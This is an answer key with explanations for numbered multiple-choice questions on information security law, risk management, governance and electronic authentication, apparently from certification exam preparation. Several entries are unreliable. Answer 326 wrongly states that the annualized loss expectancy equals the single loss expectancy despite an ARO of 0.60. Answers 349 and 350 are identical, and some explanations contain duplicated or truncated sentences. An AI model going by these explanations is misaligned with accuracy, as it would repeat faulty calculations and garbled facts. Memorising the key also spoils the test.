Answer: B. Gramm-Leach-Bliley Act (GLBA) Explanation: The GLBA requires financial institutions to explain their information-sharing practices to their customers and to safeguard sensitive data.

Answer 320

Answer: A. Fair Credit Reporting Act (FCRA) Explanation: FCRA is designed to ensure the accuracy, fairness, and privacy of the information in a consumer’s credit reports.

Answer 321

Answer: A. To regulate how websites collect data about children under 13 Explanation: COPPA imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age.

Answer 322

Answer: D. To ensure the security of credit card transactions Explanation: PCI DSS is a set of security standards designed to ensure that all companies that accept, process, store, or transmit credit card information maintain a secure environment.

Answer 323

Answer: A. Executive Order 13636 Explanation: This executive order establishes a policy to enhance the security and resilience of the nation’s critical infrastructure and to maintain a cyber environment that encourages efficiency, innovation, and economic prosperity.

Answer 324

Answer: A. Fair and Accurate Credit Transactions Act (FACTA) Explanation: FACTA aims to help consumers protect their data from identity theft. It allows consumers to request and obtain a free credit report once every twelve months from each of the three nationwide consumer credit reporting companies.

Answer 325

Answer: A. Computer Fraud and Abuse Act (CFAA) Explanation: The CFAA makes it illegal to intentionally access a computer without authorization or to exceed authorized access and thereby obtain protected information from any protected computer

Answer 326

Answer: D. $425,000. Explanation: The Annualized Loss Expectancy (ALE) is calculated by first determining the Single Loss Expectancy (SLE), which is the product of the asset value and the exposure factor (EF). In this case, the SLE would be $500,000 multiplied by 0.85, resulting in $425,000. The ALE is then calculated by multiplying the SLE by the Annualized Rate of Occurrence (ARO), which is 0.60. However, since the ALE is essentially an annualized version of the SLE in this specific scenario, the ALE would also be $425,000. The residual risk of $200,000 is a separate metric that indicates the remaining risk after security measures have been applied and does not directly factor into the ALE calculation for this question.

Answer 327

Answer: D. SLE, ARO, ALE, residual risk Explanation: The correct order of these formulas in the context of risk assessment is as follows: SLE (Single Loss Expectancy): This is calculated first as it represents the monetary loss expected from a single event. ARO (Annualized Rate of Occurrence): This is the frequency with which a threat is expected to occur within a year. ALE (Annualized Loss Expectancy): This is calculated by multiplying the SLE by the ARO; hence, it comes after SLE and ARO. Residual risk: This is the remaining risk after security controls have been applied and is typically assessed after understanding the potential losses (ALE). Thus, the proper order is Single Loss Expectancy (SLE), Annualized Rate of Occurrence (ARO), Annualized Loss Expectancy (ALE), and then residual risk.

Answer 328

Answer: C. The author’s life plus 70 years Explanation: In both the United States and the European Union, copyright protection generally lasts for the duration of the author’s life plus 70 years. This time frame provides creators with a substantial period of control over their works, incentivizing further creation and innovation. It’s important to note that copyright laws can vary by country and type of work, so always refer to specific legislation for accurate information.

Answer 329

Answer: B. Vulnerability Explanation: In the context of information security, a vulnerability refers to a flaw, loophole, oversight, or error in a system that could be exploited to cause harm. This could include software bugs, misconfigurations, weak passwords, etc. Vulnerabilities can be exploited by threats, such as hackers or malware, to perform unauthorized actions or gain unauthorized access. The process of identifying and addressing these vulnerabilities is a crucial part of any organization’s risk management and security strategy. The term “weakness” is quite often used when defining vulnerability.

Answer 330

Answer: C. Policies Explanation: Policies are the most general type of security document. They provide a high-level overview of an organization’s principles, rules, and expectations regarding information security. Policies set the foundation for all other security documents and guide the development of standards, procedures, and baselines, which are more specific and detail oriented. They are typically designed to guide decision-making and set the direction for an organization’s information security program.

Answer 331

Answer: D. The owner Explanation: Within an organization, the owner of an information asset is typically responsible for assigning sensitivity labels. These labels represent the asset’s classification level and help guide how the asset should be handled, stored, transmitted, and destroyed. The owner, having the best understanding of the data’s value and sensitivity, is in the best position to assign these labels.

Answer 332

Answer: B. Transfer the risk Explanation: When the cost of the countermeasure is more than the value of the asset, the most appropriate approach is typically to transfer the risk. This could be through insurance or by using third-party services. In this way, the organization can balance the cost of protection with the value of the asset. This doesn’t mean ignoring the risk (option A) or unnecessarily increasing costs (option D). Mitigating the risk (option C) might still be more expensive than the asset’s value.

Answer 333

Answer: A. ISO 27001 Explanation: ISO 27001 is the international standard for information security management. It establishes the requirements and best practices for an Information Security Management System (ISMS). The other ISO standards listed here are also part of the ISO 27000 series, but they focus on different aspects of information security. For example, ISO 27002 provides a code of practice for information security controls, while ISO 27004 provides guidelines for the measurement of information security. ISO 27799 provides guidelines for health informatics – information security management in health using ISO/IEC 27002.

Answer 334

Answer: A. Risk acceptance, risk transference, risk avoidance, risk mitigation Explanation: The four main risk management techniques are risk acceptance (accepting the potential loss and continuing operations), risk transference (shifting the potential loss to another party), risk avoidance (eliminating the risk by not engaging in a certain activity), and risk mitigation (reducing the impact of the risk). The other terms mentioned in the options, such as risk containment, risk migration, and risk quantification, are not standard risk management techniques.

Answer 335

Answer: D. SABSA Explanation: The Sherwood Applied Business Security Architecture (SABSA) is a framework and methodology for enterprise security architecture and service management. It is specifically designed to focus on security, unlike other models like COBIT, COSO, or the Zachman framework, which are designed for broader governance of an entire enterprise. COBIT (Control Objectives for Information and Related Technologies) and COSO (Committee of Sponsoring Organizations of the Treadway Commission) are used for IT governance and enterprise risk management, respectively. The Zachman framework is an enterprise architecture framework, which is not specifically focused on security

Answer 336

Answer: A. Due care Explanation: “Due care” refers to the effort made by an ordinarily prudent or reasonable party to prevent harm to another taking the circumstances prevent harm to another, taking the circumstances into account. It is the level of judgment, care, prudence, determination, and activity that a person would reasonably be expected to do under particular circumstances. In the context of lawsuits, demonstrating “due care” can help management show that they took all necessary precautions, even if the outcomes weren’t perfect. The other options – “prudency,” “due diligence,” and “threat agent” – are not specifically related to this context.

Answer 337

Answer: C. The Delphi method Explanation: The Delphi method is a structured communication technique, originally developed as a systematic, interactive forecasting method which relies on a panel of experts. The experts answer questionnaires in multiple rounds. After each round, a facilitator provides an anonymous summary of the experts’ forecasts from the previous round as well as the reasons they provided for their judgments. Thus, the Delphi method involves anonymous interviews or surveys, and it’s used to arrive at a group consensus. The other options – ISO/IEC 27001, qualitative valuation, and quantitative valuation – do not involve interviewing people anonymously

Answer 338

Answer: C. The same level as employees Explanation: Third-party providers should be governed at the same level as employees. This is because they often have access to the same sensitive information and systems as employees and therefore pose a similar risk. They should be subject to the same policies, procedures, and controls as employees to ensure information security. The other options – an NDA, an acceptable use policy, and the ISC2 Code of Ethics – are components of a broader governance strategy, but they are not comprehensive standards for third-party governance

Answer 339

Answer: D. Single loss expectancy (SLE) Explanation: The Single Loss Expectancy (SLE) represents the monetary loss expected from the occurrence of a risk on an asset once. It is calculated by multiplying the asset’s value (AV) by the exposure factor (EF), which represents the impact of the risk on the asset. The other terms – ALE, EF, and AV – are also important in risk assessment, but they do not directly represent the expected cost of a single loss event.

Answer 340

Answer: B. Because the worth of data varies as time progresses Explanation: Data’s value can change over time based on its relevance, accuracy, and usefulness to the organization. Therefore, it’s essential to periodically reevaluate the classification of data files and records. While the other options may influence data management practices, they don’t directly explain why data classification should be reevaluated annually.

Answer 341

Answer: C. Catering to the needs of the business Explanation: A governance framework should be designed primarily to support the needs of the business. It should guide the organization in achieving its strategic objectives while managing risks and ensuring compliance. Although maximizing profits, avoiding losses, and ensuring safety are important, they are not the primary purpose of a governance framework.

Answer 342

Answer: A. Carry out an analysis of a bit-level duplicate of the disk. Explanation: When forensically analyzing digital evidence the first priority is to create and analyze a evidence, the first priority is to create and analyze a bit-level clone of the disk. This ensures that the original evidence remains unaltered and preserves its admissibility in court. After creating the clone, further analysis like reviewing log files, detecting malicious code, or performing a steganographic analysis can be done.

Answer 343

Answer: C. Payment Card Industry Data Security Standard (PCI DSS) Explanation: The Payment Card Industry Data Security Standard (PCI DSS) is an example of self regulation. It’s a standard created by the major credit card companies to protect cardholder data. The companies themselves enforce compliance with the standard, not a governmental or external regulatory body. In contrast, Sarbanes-Oxley (SOX) and the Gramm-Leach-Bliley Act (GLBA) are examples of governmental regulation, and third party governance is a broader concept that includes various mechanisms of control over third-party relationship

Answer 344

Answer: A. It can be either allocated or accepted. Explanation: Residual risk is the remaining risk after controls and mitigation efforts have been applied. This risk can either be accepted (if it’s within the organization’s risk tolerance) or it can be assigned/transferred to another entity, such as through insurance.

Answer 345

Answer: D. Countermeasures Explanation: Risk analysis involves the identification and assessment of assets, threats, and vulnerabilities. Countermeasures, however, are a response to the identified risk, applied after risk analysis to mitigate the risk. They are not a part of the analysis itself

Answer 346

Answer: D. Risk analysis Explanation: Security safeguards and controls are used to reduce, avoid, or transfer risk. However, they do not perform risk analysis. Risk analysis is a separate process that identifies and assesses risk, which then informs the appropriate safeguards and controls.

Answer 347

Answer: B. Acceptable level Explanation: The amount of risk an organization can handle or tolerate is based on its acceptable level of risk. This level is determined by factors such as the organization’s strategic goals, resources, and risk appetite. While affordability and measurability might influence the decision, the acceptable level is the determining factor

Answer 348

C. The Control Objectives for Information and related Technology (CobiT) is a framework developed by the Information Systems Audit and Control Association (ISACA) and the IT Governance Institute (ITGI). It defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs, not specifically just security needs. The Information Technology Infrastructure Library (ITIL) is the de facto standard of best practices for IT service management. A customizable framework, ITIL provides the goals, the general activities necessary to achieve these goals, and the input and output values for each process required to meet these determined goals. In essence, CobiT addresses “what is to be achieved,” while ITIL addresses “how to achieve it.” A is incorrect because, while CobiT can be used as a model for IT governance, ITIL is not a model for corporate governance. Actually, Committee of Sponsoring Organizations of the Treadway Commission (COSO) is a model for corporate governance. CobiT is derived from the COSO framework. You can think of CobiT as a way to meet many of the COSO objectives, but only from the IT perspective. In order to achieve many of the objectives addressed in CobiT, an organization can use ITIL, which provides process-level steps for achieving IT service management objectives. B is incorrect because, as previously stated, CobiT can be used as a model for IT governance, not corporate governance. COSO is a model for corporate governance. The second half of the answer is correct. ITIL is a customizable framework that is available as a series of books or online, for IT service management. D is incorrect because CobiT defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs, not just IT security needs. ITIL provides steps for achieving IT service management goals as they relate to business needs. ITIL was created because of the increased dependence on information technology to meet business needs.

Answer 349

B is incorrect because identifying assets is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. In order to determine the value of assets, those assets must first be identified. Asset identification and valuation are also important tasks of risk management. C is incorrect because identifying threats is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. Risk is present because of the possibility of a threat exploiting a vulnerability. If there were no threats, there would be no risk. Risk ties the vulnerability, threat, and likelihood of exploitation to the resulting business impact. D is incorrect because analyzing risk in order of cost or criticality is part of the risk assessment process, and the question asks to identify what is not included in a risk assessment. A risk assessment researches and quantifies the risk a company faces. Dealing with risk must be done in a cost-effective manner. Knowing the severity of the risk allows the organization to determine how to address it effectively.

Answer 350

B is incorrect because identifying assets is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. In order to determine the value of assets, those assets must first be identified. Asset identification and valuation are also important tasks of risk management. C is incorrect because identifying threats is part of a risk assessment, and the question asks to identify what is not included in a risk assessment. Risk is present because of the possibility of a threat exploiting a vulnerability. If there were no threats, there would be no risk. Risk ties the vulnerability, threat, and likelihood of exploitation to the resulting business impact. D is incorrect because analyzing risk in order of cost or criticality is part of the risk assessment process, and the question asks to identify what is not included in a risk assessment. A risk assessment researches and quantifies the risk a company faces. Dealing with risk must be done in a cost-effective manner. Knowing the severity of the risk allows the organization to determine how to address it effectively.

Answer 351

D. The extraction of data to share with unauthorized entities is a confidentiality issue, not an integrity issue. Confidentiality ensures that the necessary level of secrecy is enforced at each junction of data processing and prevents unauthorized disclosure. This level of confidentiality should prevail while data resides on systems and devices within the network, as it is transmitted, and once it reaches its destination. Integrity, on the other hand, is the principle that signifies the data has not been changed or manipulated in an unauthorized manner. A is incorrect because integrity is related to the unauthorized manipulation or changes to data. Integrity is upheld when any unauthorized modification is prevented. Hardware, software, and communication mechanisms must work in concert to maintain and process data correctly and move data to intended destinations without unexpected alteration. The systems and network should be protected from outside interference and contamination. B is incorrect because the modification of data without authorization is related to integrity. Integrity is about protecting data so that it cannot be changed either by users or other systems that do not have the rights to do so. C is incorrect because the intentional or accidental substitution of data is related to integrity. Along with the assurance that data is not modified by unauthorized entities, integrity is upheld when the assurance of the accuracy and reliability of the information and systems is provided. An environment that enforces integrity prevents attackers, for example, from inserting a virus, logic bomb, or backdoor into a system that could corrupt or replace data. Users usually affect a system or its data’s integrity by mistake (although internal users may also commit malicious deeds). For example, a user may insert incorrect values into a data processing application that ends up charging a customer $3,000 instead of $300.

Answer 352

C. Masquerading is an attempt to gain unauthorized access by impersonating an authorized user. Masquerading is commonly used by attackers carrying out phishing attacks and has been around for a long time. For example, in 1996 hackers posed as AOL staff members and sent messages to victims asking for their passwords in order to verify correct billing information or verify information about the AOL accounts. Today, phishers often masquerade as large banking companies and well-known Internet entities like Amazon.com and eBay. Masquerading is a type of active attack because the attacker is actually doing something instead of sitting back and gathering data. A is incorrect because changing an IP packet’s source address is an example of masquerading and not a definition of masquerading. IP spoofing is the act of presenting false information within packets, to trick other systems and hide the origin of the message. This is usually done by hackers so that their identity cannot be successfully uncovered. B is incorrect because elevating privileges is not part of masquerading. Elevating privileges is often the next step after being able to penetrate a system successfully, but it does not have anything to do directly with fooling a user or system about the attacker’s true identity. D is incorrect because masquerading involves commonly posing as an authorized user that already exists in the system the attacker is attempting to access. It is common for the attacker then to attempt to create a new authorized user account on a compromised system, but successful masquerading has to happen first

Answer 353

B. The level of insurance required to cover the asset is not a consideration when assigning values to assets. It is actually the other way around: By knowing the value of an asset, an organization can more easily determine the level of insurance coverage to purchase for that asset. In fact, understanding the value of an asset is the first step to understanding what security mechanisms should be put in place and what funds should go toward protecting it. This knowledge can also help companies perform effective cost/benefit analyses, understand exactly what is at risk, and comply with legal and regulatory requirements. A is incorrect because the asset’s value in the external marketplace is a factor that should be considered when determining the value of an asset. It should also include the value the asset might have to competitors or what others are willing to pay for a given asset. C is incorrect because the initial and outgoing costs of purchasing, licensing, and supporting the asset are considerations when determining the cost and value of an asset. The asset must be cost-effective to the business directly. If the supporting requirements of maintaining the asset outweighs the business need for the asset, its value will decrease. D is incorrect because it is a factor to be considered when determining an asset’s value. The asset’s value to the organization’s production operations is the determination of cost to an organization if the asset is not available for a certain period of time. Along these same lines, the asset’s usefulness and role in the organization should be considered as well as the operational and production activities affected if the asset is unavailable. If the asset helps operations it is valuable; the trick is to figure out how valuable.

Answer 354

A. The best approach to securing the database in this situation would be to increase the controls and assign very granular permissions. These measures would ensure that users cannot abuse their privileges and the confidentiality of the information would be maintained. Granularity of permissions gives network administrators and security professionals additional control over the resources they are charged with protecting, and a fine level of detail enables them to give individuals just the precise level of access they need. B is incorrect because implementing access controls that display each user’s permissions each time they access the database is an example of one control. It is not the overall way of dealing with user access to a full database of information. This may be an example of increasing database security controls, but it is only one example and more would need to be put into place. C is incorrect because the classification level of the information in the database was previously determined based on its confidentiality, integrity, and availability levels. These levels do not change simply because more users need access to the data. Thus, you would never increase or decrease the classification level of information when more users or groups need to access that information. Increasing the classification level would only mean a smaller subset of users could access the database. D is incorrect because it puts data at risk. If security is decreased so that all users can access it as needed, then users with lower privileges will be able to access data of higher classification levels. Lower security also makes it easier for intruders to break into the database. As stated in answer C, a classification level is not changed just because the number of users who need to access the data increases or decreases

Answer 355

C. Countermeasures are implemented to reduce overall risk to an acceptable level. However, no system or environment is 100 percent secure, and with every countermeasure some risk remains. The leftover risk after countermeasures are implemented is called residual risk. Residual risk differs from total risk, which is the risk companies face when they choose not to implement any countermeasures. While the total risk can be determined by calculating threats × vulnerability × asset value = total risk, residual risk can be determined by calculating (threats × vulnerability × asset value) × control gap = residual risk. Control gap is the amount of protection the control cannot provide. A is incorrect because threats × vulnerability × asset value does not equal residual risk. It is the equation to calculate total risk. Total risk is the risk a company faces in the absence of any security safeguards or actions to reduce the overall risk exposure. The total risk is reduced by implementing safeguards and countermeasures, leaving the company with residual risk—or the risk left over after safeguards are implemented. B is incorrect because SLE × frequency is the equation to calculate the annualized loss expectancy (ALE) as a result of a threat exploiting a vulnerability and the business impact. The frequency is the threat’s annual rate of occurrence (ARO). The ALE is not equal to residual risk. ALE indicates how much money a specific type of threat is likely to cost the company over the course of a year. Knowing the real possibility of a threat and how much damage, in monetary terms, the threat can cause is important in determining how much should be spent to try and protect against that threat in the first place. D is incorrect and is a distracter answer. There is no such formula like this used in risk assessments. The actual equations are threats × vulnerability × asset value = total risk; and (threats × vulnerability × asset value) × control gap = residual risK

Answer 356

D. The Chief Privacy Officer (CPO) position is being created by companies in response to the increasing demands on organizations to protect myriad types of data. The CPO is responsible for ensuring the security of customer, company, and employee data, which keeps the company free from legal prosecution and—hopefully—out of the headlines. Thus, the CPO is directly involved with setting policies on how data is collected, protected, and distributed to third parties. The CPO is usually an attorney and reports to the Chief Security Officer. A is incorrect because protecting partner data is just a small subset of all the data the CPO is responsible for protecting. CPOs are responsible for ensuring the protection of customer, company, and employee data. Partner data is among the various types of data that the CPO is responsible for protecting. In addition, the CPO is responsible for knowing how its company’s suppliers, partners, and other third parties are protecting its sensitive information. Many times, companies will need to review these other parties (which have copies of data needing protection). B is incorrect because the accuracy of financial information is the responsibility of its data owner—the Chief Financial Officer (CFO). The CFO is responsible for the corporation’s account and financial activities, and the overall financial structure of the organization. The CPO is responsible for helping to ensure the secrecy of this data, but not the accuracy of the data. The financial information is also a small subset of all the data types the CPO is responsible for protecting. C is incorrect because the definition and enforcement of security policies is the responsibility of senior management, commonly delegated to the CISO or CSO—not the CPO. A security policy is an overall general statement that dictates what role security plays within the organization. The CPO’s responsibilities as they relate to policies are to contribute to the setting of data protection policies, including how data is collected, protected, and distributed to third parties.

Answer 357

C. Any individual who routinely uses data for work-related tasks is a data user. Users must have the necessary level of access to the data to perform the duties within their position and are responsible for following operational security procedures to ensure the data’s confidentiality, integrity, and availability to others. This means that users must practice due care and act in accordance with both security policy and data classification rules. A is incorrect because the data owner has a greater level of responsibility in the protection of the data. Data owners are responsible for classifying the data, regularly reviewing classification levels, and delegating the responsibility of the data protection duties to the data custodian. The data owner is typically a manager or executive in the organization and is held responsible when it comes to protecting the company’s information assets. B is incorrect because the data custodian is responsible for the implementation and maintenance of security controls as dictated by the data owner. In other words, the data custodian is the technical caretaker of the controls that protects the data. Her duties include making backups, restoring data, implementing and maintaining countermeasures, and administering controls. D is incorrect because an information systems auditor is responsible for evaluating controls. After evaluating the controls, the auditor provides reports to management, illustrating the mapping between the set acceptable risk level of the organization and her findings. This does not have to do with using the data or practicing due care with the use of data.

Answer 358

C. While ANZ 4360 can be used to analyze security risks, it was not created for that purpose. It takes a much broader approach to risk management than other risk assessment methodologies, such as NIST and OCTAVE, which focus on IT threats and information security risks. ANZ 4360 can be used to understand a company’s financial, capital, human safety, and business decisions risks. A is incorrect because there is no formal FAP risk analysis approach. It is a distracter answer. B is incorrect because OCTAVE focuses on IT threats and information security risks. OCTAVE is meant to be used in situations where people manage and direct the risk evaluation for information security within their organization. The organization’s employees are given the power to determine the best approach for evaluating security. D is incorrect because NIST SP 800-30 is specific to IT threats and how they relate to information security risks. It focuses mainly on systems. Data is collected from network and security practice assessments, and from people within the organization. The data is then used as input values for the risk analysis steps outlined in the 800-30 document.

Answer 359

B. If all security activity takes place within the security department, then security is working within a silo and is not integrated throughout the organization. In a company with a security governance program, security responsibilities permeate the entire organization, from executive management down the chain of command. A common scenario would be executive management holding business unit managements responsible for carrying out risk management activities for their specific business units. In addition, employees are held accountable for any security breaches they participate in, either maliciously or accidentally. A is incorrect because security governance is a set of responsibilities and practices exercised by the board and executive management of an organization with the goal of providing strategic direction, ensuring that objectives are achieved, ascertaining that risks are managed appropriately, and verifying that the organization’s resources are used responsibly. An organization with a security governance program in place has a board of directors that understands the importance of security and is aware of the organization’s security performance and breaches. C is incorrect because security governance is a coherent system of integrated security components that includes products, personnel, training, processes, etc. Thus, an organization with a security governance program in place is likely to purchase and deploy security products, managed services, and consultants in an informed manner. They are also constantly reviewed to ensure they are cost-effective. D is incorrect because security governance requires performance measurement and oversight mechanisms. An organization with a security governance program in place continually reviews its processes, including security, with the goal of continued improvement. On the other hand, an organization that lacks a security governance program is likely to march forward without analyzing its performance and therefore repeatedly makes similar mistakes.

Answer 360

A. Before Michael begins developing his company’s classification program, he must understand the different levels of protection that must be provided. Only then can he develop the necessary classification levels and their criteria. One company may choose to use only two layers of classification, while another may choose to use more. Regardless, when developing classification levels, he should keep in mind that too many or too few classification levels will render the classification ineffective; there should be no overlap in the criteria definitions between classification levels; and classification levels should be developed for both data and software. B is incorrect because data classification criteria cannot be established until the classification levels themselves have been defined. The classification criteria are used by data owners to know what classification should be assigned to specific data. Basically, the classifications are defined buckets and the criteria help data owners determine what bucket each data set should be put into. C is incorrect because there is no need to identify the data custodians until classification levels are defined, criteria are determined for how data are classified, and the data owner has indicated the classification of the data she is responsible for. Remember, the data custodian is responsible for implementing and maintaining the controls specified by the data owner. D is incorrect because protection mechanisms for each classification level cannot be determined until the classification levels themselves are defined based on the different levels of protection that are required. The types of controls implemented per classification will depend upon the level of protection that management and the security team have determined is needed.

Answer 361

D. The ISO/IEC 27005 standard is the guideline for information security risk management. ISO/IEC 27005 is an international standard for how risk management should be carried out in the framework of an information security management system (ISMS). A is incorrect because ISO/IEC 27002 is the code of practice for information security management; thus, it has a correct mapping. ISO/IEC 27002 provides best practice recommendations and guidelines as they pertain to initiating, implementing, or maintaining information security management systems (ISMS). B is incorrect because ISO/IEC 27003 is the guideline for ISMS implementation; thus, it has a correct mapping. It focuses on the critical aspects needed for successful design and implementation of an information security management system (ISMS) in accordance with ISO/IEC 27001:2005. It describes the process of ISMS specification and design from inception to the production of implementation plans. C is incorrect because ISO/IEC 27004 is the guideline for information security management measurement and metrics framework; thus, it has a correct mapping. It provides guidance on the development and use of measures and measurement in order to assess the effectiveness of an implemented information security management system (ISMS) and controls or groups of controls, as specified in ISO/IEC 2700

Answer 362

1. d. Stateful protocol analysis (also known as deep packet inspection) is the process of comparing predetermined profiles of generally accepted definitions of benign protocol activity for each protocol state against observed events to identify deviations. Stateful protocol analysis uses blacklists, whitelists, thresholds, and program code viewing to provide various security capabilities. A blacklist is a list of discrete entities, such as hosts or applications that have been previously determined to be associated with malicious activity. A whitelist is a list of discrete entities, such as hosts or applications known to be benign. Thresholds set the limits between normal and abnormal behavior of the intrusion detection and prevention systems (IDPS). Program code viewing and editing features are established to see the detection-related programming code in the IDPS.

Answer 363

C. An applicant applies to a registration authority (RA) to become a subscriber of a credential service provider (CSP) and, as a subscriber, is issued or registers a secret, called a token, and a credential (public key certificate) that binds the token to a name and other attributes that the RA has verified. The token and credential may be used in subsequent authentication events.

Answer 364

B. The RA performs the identity proofing after registering the applicant with the CSP. An applicant becomes a subscriber of the CSP.

Answer 365

D. The relying party can use the authenticated information provided by the verifier/CSP to make access control decisions or authorization decisions. The verifier verifies that the claimant is the subscriber/applicant through an authentication protocol. The verifier passes on an assertion about the identity of the subscriber to the relying party. The verifier and the CSP may or may not belong to the same identity.

Answer 366

A. An authenticated session is established between the claimant and the relying party. Sometimes the verifier is also the relying party. The other three choices are incorrect because the correct answer is based on facts.

Answer 367

B. The use of digital certificates represents a logical link between the verifier and the CSP rather than a physical link. In some implementations, the verifier, relying party, and the CSP functions may be distributed and separated. The verifier needs to directly communicate with the CSP only when there is a physical link between them. In other words, the verifier does not need to directly communicate with the CSP for the other three choices.

Answer 368

A. The CSP maintains registration records for each subscriber to allow recovery of registration records. Other responsibilities of the CSP include the following: The CSP is responsible for establishing suitable policies for renewal and reissuance of tokens and credentials. During renewal, the usage or validity period of the token and credential is extended without changing the subscriber’s identity or token. During reissuance, a new credential is created for a subscriber with a new identity and/or a new token. The CSP is responsible for maintaining the revocation status of credentials and destroying the credential at the end of its life. For example, public key certificates are revoked using certificate revocation lists (CRLs) after the certificates are distributed. The verifier and the CSP may or may not belong to the same entity. The CSP is responsible for mitigating threats to tokens and credentials and managing their operations. Examples of threats include disclosure, tampering, unavailability, unauthorized renewal or reissuance, delayed revocation or destruction of credentials, and token use after decommissioning. The other three choices are incorrect because the (i) subscriber is a party who has received a credential or token from a CSP, (ii) relying party is an entity that relies upon the subscriber’s credentials or verifier’s assertion of an identity, and (iii) registration authority (RA) is a trusted entity that establishes and vouches for the identity of a subscriber to a CSP. The RA may be an integral part of a CSP, or it may be independent of a CSP, but it has a relationship to the CSP(s).

Answer 369

A. It is suggested that a personal identity verification (PIV) card token is used in the unique identification of employees and contractors. The PIV is a physical artifact (e.g., identity card or smart card) issued to an individual that contains stored identity credentials (e.g., photograph, cryptographic keys, or digitized fingerprint). The other three choices are used in user authenticator management, not in user identifier management. Examples of user authenticators include passwords, tokens, cryptographic keys, personal identification numbers (PINs), biometrics, public key infrastructure (PKI) certificates, and key cards. Examples of user identifiers include internal users, external users, contractors, guests, PIV cards, passwords, tokens, and biometrics.

Answer 370

B. The token may be a piece of hardware that contains a cryptographic key that produces the authenticator used in the authentication process to authenticate the claimant. The key is protected by encrypting it with a password. The other three choices cannot produce an authenticator. A public key is the public part of an asymmetric key pair typically used to verify signatures or encrypt data. A verifier is an entity that verifies a claimant’s identity. A private key is the secret part of an asymmetric key pair typically used to digitally sign or decrypt data. A claimant is a party whose identity is to be verified using an authentication protocol.

Answer 371

C. Shared secrets are based on either symmetric keys or passwords. The asymmetric keys are used in public key pairs. In a protocol sense, all shared secrets are similar and can be used in similar authentication protocols.

Answer 372

C. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. Assertions may be digitally signed objects, or they may be obtained from a trusted source by a secure protocol. X.509 certificates are examples of electronic credentials, not assertions. Cookies, security assertions markup language (SAML), and Kerberos tickets are examples of assertions.

Answer 373

A. When electronic credentials are stored in a directory or database server, the directory or database may be an untrusted entity because the data it supplies is self-authenticated. Alternatively, the directory or database server may be a trusted entity that authenticates itself to the relying party or verifier, but not to the CSP.

Answer 374

A. The correct flows and proper interactions between the various parties involved in electronic authentication include the following: An individual applicant applies to a registration authority (RA) through a registration process to become a subscriber of a credential service provider (CSP) The RA identity proofs that applicant On successful identity proofing, the RA sends the CSP a registration confirmation message A secret token and a corresponding credential are established between the CSP and the new subscriber for use in subsequent authentication events The party to be authenticated is called a claimant (subscriber) and the party verifying that identity is called a verifier The other three choices are incorrect be

Answer 375

B. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber (i.e., claimant). These assertions are used to pass information about the claimant from the verifier to a relying party. Assertions may be digitally signed objects or they may be obtained from a trusted source by a secure protocol. When the verifier and the relying parties are separate entities, the verifier conveys the result of the authentication protocol to the relying party. The object created by the verifier to convey the result of the authentication protocol is called an assertion. The credential service provider and the registration authority are not part of the assertion process.

Answer 376

C. Both the Bell-LaPadula model and domain type enforcement model uses restricted access control models because they are employed in safety-critical systems, such as military and airline systems. In a restricted model, the access control policies are expressed only once by a trusted principal and fixed for the life of the system. The identitybased and attribute-based access control policies are not based on restricted access control models but based on identities and attributes respectively.

Answer 377

C. Entropy in an information system is the measure of the disorder or randomness in the system. Passwords need high entropy because low entropy is more likely to be recovered through brute force attacks. Salting is the inclusion of a random value in the password hashing process that greatly decreases the likelihood of identical passwords returning the same hash. Larger salts effectively make the use of Rainbow Tables (lookup tables) by attackers infeasible. Many operating systems implement salted password hashing mechanisms to reduce the effectiveness of password cracking. Stretching, which is another technique to mitigate the use of rainbow tables, involves hashing each password and its salt thousands of times. Larger stretching makes the creation of rainbow tables more time consuming, which is not good for the attacker, but good for the attacked organization. Rainbow tables are lookup tables that contain precomputed password hashes. Therefore, passwords with high entropy, larger salts, and larger stretching can mitigate password guessing and cracking attempts by attackers.

Answer 378

C. The authenticator is generated through the use of a token. In the trivial case, the authenticator may be the token secret itself where the token is a password. In the general case, an authenticator is generated by performing a mathematical function using the token secret and one or more optional token input values such as a nonce or challenge. A salt is a nonsecret value used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker. A seed is a starting value to generate initialization vectors. A nonce is an identifier, a value, or a number used only once. Using a nonce as a challenge is a different requirement than a random-challenging because a nonce is predictable. A shim is a layer of host-based intrusion detection and prevention code placed between existing layers of code on a host that intercepts data and analyzes it.

Answer 379

B. Using one token to gain access to a second token is considered a single token and a single factor scheme because all that is needed to gain access is the initial token. Therefore, when this scheme is used, the compound solution is only as strong as the token with the lowest assurance level. The other choices are incorrect because they are not applicable to the situation here.

Answer 380

D. A password synchronization solution takes a password from a user and changes the passwords on other resources to be the same as that password. The user then authenticates directly to each resource using that password. There is no centralized directory or no authentication server performing authentication on behalf of the resources. The primary benefit of password synchronization is that it reduces the number of passwords that users need to remember; this may permit users to select stronger passwords and remember them more easily. Unlike single sign-on (SSO) technology, password synchronization does not reduce the number of times that users need to authenticate. Password synchronization solutions are typically easier, less expensive, and less secure to implement than SSO technologies

Answer 381

A. All four choices are problems with password synchronization solution. Because the same password is used for many resources, the compromise of any one instance of the password compromises all the instances, therefore becoming a single point-of-failure. Password synchronization forces the use of the lowest common denominator approach to password strength, resulting in weaker passwords due to character and length constraints. Passwords can become unsynchronized when a user changes a resource password directly with that resource instead of going through the password synchronization user interface. A password could also be changed due to a resource failure that requires restoration of a backup.

Answer 382

C. Access control policy may benefit from separating Web services into various domains or compartments. This separation can be implemented in ABAC using resource attributes or through additional roles defined in RBAC. The other three choices cannot handle separation of domains.

Answer 383

A. Having a common password shared among all local administrator or root accounts on all machines within a network simplifies system maintenance, but it is a widespread security weakness, becoming a single point-of-failure. If a single machine is compromised, an attacker may recover the password and use it to gain access to all other machines that use the shared password. Therefore, it is good to avoid using the same local administrator or root account passwords across many systems. The other three choices, although risky in their own way, do not yield a single point-of-failure.

Answer 384

B. In a multistage token scheme, two tokens are used in two stages, and additional tokens are used for transaction receipt and confirmation mechanism to achieve the required assurance level. The level of assurance of the combination of the two stages can be no higher than that possible through a multitoken authentication scheme using the same set of tokens.

Answer 385

